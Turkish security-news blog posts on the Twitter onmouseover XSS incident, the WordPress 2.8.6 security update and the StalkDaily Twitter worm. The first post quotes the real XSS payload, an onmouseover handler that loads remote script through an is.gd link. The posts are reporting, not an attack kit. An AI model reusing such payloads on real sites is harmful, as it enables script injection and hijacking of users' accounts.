Zafer Yılmaz

Twitter’ın mouseover java script açığı, tüm kullanıcıları etkiledi

Bugün gerçekleşen bir güvenlik açığı, tüm twitter kullanıcılarını etkisi altına aldı. Twitter hesaplarını web üzerinden kullanan kullanıcıları etkisi altına alan bu kod açıklığı, listenizdeki kullanıcıların tweet’lerine yansıyan arka planı ve yazıtipi siyah bir şekilde karşımıza çıktı. Siz fare imlecinizi bu tweet’in üzerine getirir getirmez, otomatik olarak RT yani Re-tweet yapmanızı sağlayan ilgili açıklık, yine web tarayıcınıza twitter’dan kaynaklı olarak değişik hata mesajı içerikleriyle karşılandı. İçeriği aşağıdaki şekilde olan açıklığın, ekran görüntüsüne de aşağıdan ulaşabilirsiniz:

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7′)”/

http://yfrog.com/mqdirdp

Sorunun şimdilik giderilmesi için mobile.tweeter.com sitesi önerilirken, tweetdeck gibi 3rd yazılımların da, sorundan etkilenmediğini belirtmem gerekiyor. Resmi bir açıklama yapmayan twitter, benzer durumlarda kullandığı twitter hesabından kullandığı status raporlarından konunun XSS attack ‘a bağlı olarak açıklıktan faydalanıldığını ve kısa sürede giderileceğini haber vermiş.

Tags: Exploit, mouseover javascript code, Onmouseover, twitter, Twitter Got Hacked, Twitter Mouseover Security Flaw, twitter vulnerability, XSS, XSS attack

WordPress 2.8.6 Güvenlik Yükseltmesi

WordPress için sürüm 2.8.6 yayınlandı. Bu sürümle birlikte 2 adet güvenlik problemi gideriliyor. Özellikle blogunuzda yazı yazma yetkisi olan herhangi bir kullanıcının açıklığa sebebiyet verebileceği söyleniyor. Bu nedenle eğer birden fazla ve fazla güvenmediğiniz kişilerin yazı yazmasına izin veriyorsanız, 2.8.6 sürümüne mutlaka yükseltmelisiniz.

Bunun dışında XSS açıklığının  ve blog’a yüklenen dosya isimlerinin bazı Apache konfigürasyonlarında görünmesi gibi açıklıklarının kapatılmasını sağlayan 2.8.6 sürümünü indirmek için bu adresi kullanabilirsiniz.

Tags: wordpress, wordpress 2.8.6, wordpress update, XSS

twitter sitesinin yavaşlığı worm saldırılarından mı kaynaklanıyor?

İnternet ortamının olmazsa olmazları arasında yer almayı başaran ve adeta bir sektör olan Sosyal Ağ ortamları dün geçtikçe daha fazla önem kazanıyor. Bunun en büyük örnekleri arasında yer alan twitter.com sitesi, facebook ve myspace gibi sitelerden sonra en çok kullanılan 3. paylaşım sitesi olarak kullanılıyor. Bunu geçtiğimiz seneye oranla yaklaşık olarak %400 kullanıcı artışına bağlayabiliriz. Yanlız büyümeyle beraber çeşitli sıkıntılar da beraberinde geliyor.

twitter’ın büyümesi ile birlikte önce sitenin sertifika sorunu boy göstermiş ve ardından çeşitli phising saldırıları gerçekleşerek, sitenin itibari (Özellikle güvenlik konusunda) bir nevi sarsılmıştı. Şimdiki sorun ise, diğerlerine nispeten daha büyük gözüküyor. Bir worm saldırısı olarak nitelendirilen saldırı neticesinde, kullanıcıların Javascript destekli sayfalarına yerleşen kurtçuk, bu profili her ziyaret eden kullanıcının da profiline bulaşarak ciddi bir oranda yayılmaya başlıyor. Cumartesi günü başlayan sorun, twitter servislerindeki XSS (Cross site scripting) açığı sayesinde gerçekleşmiş [Konu ile ilgili IE8'nin XSS güvenlik tedbirleri slaytlarına bakabilirsiniz]. Kullanıcılar ilgili post’lara reply yapınca, worm otomatik olarak StalkDaily.com adlı bir sitenin reklamını yapıyor. twitter yetkilileri 36 saat sonra 3 yeni worm açığı tespit etmiş ve yaklaşık olarak 10.000 post bu sorundan etkilenmiş.

Şimdilik ilgili sorunu kapatan yetkililerin, ana XSS sorununu kapatamadıkları söyleniyor. Böylece ilgili worm, yeni şekillerde karşılarına çıkabilir ve ilgili açıklıklardan faydalanarak daha fazla kullanıcıyı etkileyerek, ciddi zararlar verebilir. Geçtiğimiz günlerde bende çeşitli login sorunları yaşamış ve bir müddet siteye erişememiştim. twitter, meşhur balinasını kaldırmak için daha çok kuş sürüsüne sahip olması gerekiyor

Tags: Cross-site scripting, Hacking, twitter, twitter worm, worm, XSS